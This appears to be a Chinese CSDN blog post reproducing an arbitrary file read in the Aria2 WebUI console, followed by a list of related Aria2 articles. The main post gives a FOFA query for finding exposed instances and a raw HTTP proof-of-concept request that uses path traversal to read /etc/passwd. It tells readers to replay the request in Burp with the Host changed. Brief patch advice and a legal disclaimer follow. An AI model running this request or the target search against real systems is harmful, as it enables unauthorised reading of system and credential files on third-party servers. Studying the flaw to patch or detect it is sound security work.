【漏洞复现】Aria2 WebUI控制台 任意文件读取漏洞

最新推荐文章于 2024-07-12 08:36:20 发布
最新推荐文章于 2024-07-12 08:36:20 发布
阅读量538 收藏 7
点赞数 13
分类专栏: 漏洞复现 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KKleeeaa/article/details/135930040
版权

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01 FOFA语法

app="Aria2-WebUI"

图片

页面大概是长这个样子的

图片

老样子直接把POC放在Burp重放一下改一下Host就行。

0x02 POC

放在Burp跑跑跑跑跑!!!!!!!!

GET  /../../../../etc/passwd  HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0
Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

哦吼哦吼,怎么回事老弟,passwd怎么出来了。

图片

0x03 修复建议

关闭互联网暴露面或部署WAF防护

升级至安全版本

小编提示:未经授权的渗透测试属于违法行为!!!!

还没有加群聊的师傅们赶紧冲啊,群里面有很多工具,经验分享等。目前免费啊!!!

图片

个人观点,仅供参考

Aniya也会哭
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Aria2 WebUI控制台 任意文件读取漏洞复现(CVE-2023-39141)
0xSec
01-22 566
Aria2WebUI控制台存在目录遍历漏洞,未授权的攻击者可通过../目录遍历读取任意系统文件,导致系统敏感信息泄露,使系统处于极不安全的状态。
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1562
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
webui-aria2:该项目的目的是创建与aria2交互的世界上最好,最热的界面。 使用非常简单,只需在任何Web浏览器中下载并打开index.html
02-21
WebUI-Aria2 该项目的目的是创建与aria2交互的世界上最好,最热的界面。 aria2是世界上最好的文件下载器,但有时命令行带来了不必要的功能。 该项目最初是作为GSOC计划的一部分创建的,但是在aria2社区的大力支持和反馈下,该项目Swift发展并发生了变化。 使用非常简单,没有构建脚本,没有安装脚本。 首先在本地计算机或远程计算机中在后台启动aria2。 您可以按照以下步骤进行操作: aria2c --enable-rpc --rpc-listen-all 如果您的本地计算机上未安装aria2,请转到并按照那里的说明进行操作。 然后要使用WebUI-Aria2, 您可以下载该存储库,然后从docs文件夹中打开index.html。 或者,您可以直接访问并开始下载文件! 使用访问URL后,即使离线也可以打开相同的URL。 或者,您还可以使用NodeJS通过在项
vulhub漏洞复现系列之aria2任意文件写入漏洞
weixin_43071873的博客
12-08 775
我的天,这个漏洞复现,你看了我的博客之后你再说不会复现我揍你我跟你讲!(狗头保命) 工具介绍: Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞漏洞描述: 通过控制文件下载链接,文件储存路径以及文件名,可以实现任意文件写入。同时通过Aria2提供的其他功能,诸
vulhub漏洞复现三_aria2
weixin_44193247的博客
01-04 480
vulhub漏洞复现练习篇
aria2安装webui
weixin_30420305的博客
03-13 463
  安装aria2 yum install aria2   安装完成后可以使用简单命令进行下载 aria2c http://example.org/mylinux.iso aria2c -c -s 5 http://example.org/mylinux.iso -c : 断点续传 -s : 使用线程数   配置aria2.conf文件参数 # 设置的RPC...
在Ubuntu19.04下安装Aria2Aria2WebUI AriaNg
yang_sx的博客
05-05 6780
Aria2&&Aria2 WebUI安装配置Aria2apt仓库安装安装命令如下创建aria2相关配置文件路径创建aria2相关配置文件并写入内容运行测试Aria2前台方式运行aria2以后台方式运行aria2配置WEBUI AriaNgAriaNg的Github地址AriaNg配置安装Apache2(如果有web服务器可跳过)下载安装AriaNg检查AriaNg工作情况注记 安装...
1+X证书web前端开发(中级)部分习题整理(题源来自奥鹏教育)
qq_49228887的博客
08-25 9842
目录MySQL数据库基础与应用PHP技术与应用WEB前后端数据交互技术响应开发技术 MySQL数据库基础与应用 1.【单选题】下列哪个是MySQL的配置文件(B) (8分) A COPYING B my-default.ini C README D bin 2. 【单选题】以下哪项不是mysql的特点(D) (8分) A Mysql是开源的 B使用方便 C功能全面 D MySQL是非关系型数据库 3. 【单选题】MySQL的密码在下边哪个文件中可以找到(C) (8分)
构建 cloudreve 捐赠版docker 镜像
qq_37666892的博客
03-12 1507
为cloudreve 捐赠版构建docker 镜像并启动
c#视觉应用开发中如何使用OpenCV库进行计算机视觉处理?
最新发布
zhangzhechun的专栏
07-12 114
通过Emgu CV,你可以在C#中轻松地调用OpenCV的功能来进行计算机视觉处理。上面的示例展示了如何读取和显示图像以及进行简单的边缘检测。你可以根据需要扩展这些示例来实现更多复杂的图像处理任务。通过Emgu CV,你可以在C#中实现各种复杂的计算机视觉任务,从基本的图像读取和显示,到高级的特征检测和匹配。Emgu CV提供了丰富的功能,使得在.NET环境中使用OpenCV变得简便。你可以根据项目需求,进一步探索Emgu CV提供的其他功能和模块。
aria2_web下载器
07-26
aria2_web,在浏览器端,可以多线程下载的下载器
aria2c+WebUI.rar
04-04
aria2c+WebUI,已经配置好,可以直接使用。也可以作为参数设置的参考。需要其他版本在自行替换。
推荐开源项目:WebUI-Aria2 - 高效的图形化Aria2下载管理器
gitblog_00087的博客
05-09 956
推荐开源项目:WebUI-Aria2 - 高效的图形化Aria2下载管理器 webui-aria2The aim for this project is to create the worlds best and hottest interface to interact with aria2. Very simple to use, just download and open index.h...
linux aria2界面,如何使用aria2webui
weixin_42504214的博客
05-07 1415
背景介紹Aria2 是一個輕量的多協議多源命令行下載工具,支持 HTTP/HTTPS, FTP, SFTP, BitTorrent and Metalink 等協議下的下載。aria2 可通過內置的 JSON-RPC 及 XML-RPC interfaces 來進行操作,可通過 web 界面管理下載。aria2 is a lightweight multi-protocol & multi...
archlinux 安装aria2 webui
greatyoulv的专栏
04-18 1887
一、aria2 安装aria2 pacman -S aria2 配置aria2 vi /etc/aria2/aria2.conf continue daemon=true dir=/sata/public/ enable-rpc=true rpc-listen-all=true rpc-secret=44a70bf2-token93c6-96359e3e53ee 开机启动aria...
下载神器Aria2 + WebUI-Aria2 + 接管Chrome下载任务
热门推荐
lalifeier的博客
09-11 2万+
Aria2介绍 aria2 是一个轻量级的、多源、跨平台的命令行下载实用工具。它支持HTTP/HTTPS、FTP、SFTP、BitTorrent和Metalink。 Aria2特点 Multi-Connection Download. aria2 can download a file from multiple sources/protocols and tries to utilize yo...
Linux下安装aria2 + webui-aria2,搭建一个下载服务器
学亮编程手记
07-31 1343
如果你的电脑安装了nginx,你可以直接将webui-aria2目录下的所有文件复制到你的nginx服务根目录,然后在浏览器输入你的服务器IP或者本机输入localhost即可打开。打开后需要点击设置–链接设置,在密码令牌填入你启动aria2时设置的密钥!也可在webui-aria2目录下的configuration.js里面token填入你的密钥,以避免每次进入都需要输入!运行使用启动aria2的rpc服务(建议使用screen后台启动)为了方便以后使用,可以将以上命令放在脚本中使用。
linux的webui服务,Aria2控制前端WebUI客户端安装教程
weixin_36467693的博客
05-03 1377
Aria2是一个命令行下运行、多协议、多来源下载工具(HTTP/HTTPS、FTP、BitTorrent、Metalink),并且支持迅雷离线以及百度云等常用网盘的多线程下载(甚至可以超过专用客户端的下载速度)但是Aria2是一个命令行软件,很多人嫌麻烦或者不会弄,就这样错过了一个下载神器,因此我们可以使用一个Aria2的控制前端,直接通过浏览器来操作下载,简单容易,Aria2 Web前端界面,无...
Aria2 UI单机版程序
mcx1230的专栏
04-04 434
最近发现有个开源的下载工具Aria2c,支持的下载协议也挺丰富的,唯一一点美中不足,没有界面。 基于开源的Aria2m开发的Aria2Mini下载工具,补充了Aria2c、配置文件以及网页版的UI界面,可以像使用迅雷一样的使用Aria2,有需求的就来试试吧,下载连接见下方: 下载连接:https://download.csdn.net/download/mcx1230/...
aria2 配置文件
09-09
aria2 是一款轻量级的多线程下载工具,以下是一个简单的 aria2 配置文件示例: ``` # 文件名:aria2.conf # 设置 RPC 监听端口 rpc-listen-port=6800 # 设置 RPC 认证信息,用户名和密码 rpc-user=username rpc-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值